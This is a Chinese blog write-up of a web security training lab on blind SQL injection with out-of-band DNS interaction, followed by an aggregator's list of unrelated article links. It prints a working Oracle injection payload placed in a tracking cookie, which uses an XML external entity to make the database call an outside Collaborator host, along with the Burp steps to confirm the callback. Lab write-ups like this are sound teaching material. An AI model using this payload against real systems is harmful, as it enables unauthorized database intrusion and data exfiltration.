当前位置: 首页 > news >正文

Lab16_ Blind SQL injection with out-of-band interaction

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

带外交互的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

要解决这个实验,利用SQL注入漏洞导致DNS查找Burp Collaborator。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示:

你可以在我们的SQL注入备忘单上找到一些有用的有效载荷。

进入实验室

仍然是一个商店页面

构造 payload

在本关主要目的是体验 OOB(DNS 带外),DNS 外带的核心是让盲注变为显错注入,在无法利用漏洞获得回显的情况下,目标可以发起请求,这个时候就可以通关 DNS 请求把想获得的数据外带出来

依旧是使用 burp 进行抓包注入

利用 union 联合查询结合 xml 外部实体攻击(XXE)来构造 payload

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://1prcgeu2pgeoycglrzqok5dsxj3ar2fr.oastify.com/"> %remote;]>'),'/l') FROM dual--

extractvalue()函数是 Oracle 数据库的 XML 函数,用于从 XML 片段中提取值

xmltype()构造是将字符串转换为 Oracle 的 XMLtype 对象,强制解析 XML 内容

打开 burp 中的 Collaborator,复制链接

将 payload 粘贴在 cookie 后面,并进行 url 编码

返回 Collaborator 模块,点击 Poll now,可以看到返回四个域名,以及对应的源 ip 地址

返回商店页面,可以看到通关提示

相关文章:

  • RabbitTemplate类介绍、应用场景和示例代码
  • 【腾讯云】存储桶API
  • 【探商宝】大数据企业销售线索平台:销售型公司的战略转型引擎
  • Linux流量分析工具
  • RV1126+FFMPEG多路码流监控项目
  • 蓝桥杯java-B组真题—动态规划
  • 9.2go接口
  • Docker创建自定义网桥并指定网段
  • yolov5代码详解--1.python代码脚本
  • 【Multipath】使用(FC)访问远程存储设备
  • linux的文件系统及文件类型
  • 数据库管理-第300期 一个不痛不痒的BUG(20250307)
  • 强化学习(赵世钰版)-学习笔记(2.状态值与贝尔曼方程)
  • HarmonyOS 应用程序包结构 (编译态)
  • Spring AI Alibaba + Ollama:国产大模型DeepSeek LLM的低成本AI应用开发认知
  • 【CentOS】搭建Radius服务器
  • NTIRE比赛:技术前沿、国内企业表现与计算机视觉未来展望
  • Android AudioFlinger(二)——AndroidAudio Flinger的启动流程
  • 【Conda】Windows安装conda/Anaconda环境
  • c语言笔记 fgets
  • 超低价的锦州网站建设/百度seo服务
  • 用ssh做的网站/郑州网站推广公司咨询
  • 永久免费云服务器推荐/北京seo关键词排名优化软件
  • wordpress 替换google/烟台seo网络推广
  • 做网站业务员应该了解什么/房产网站建设
  • 佳木斯市向阳区建设派出所网站/seo快速排名软件推荐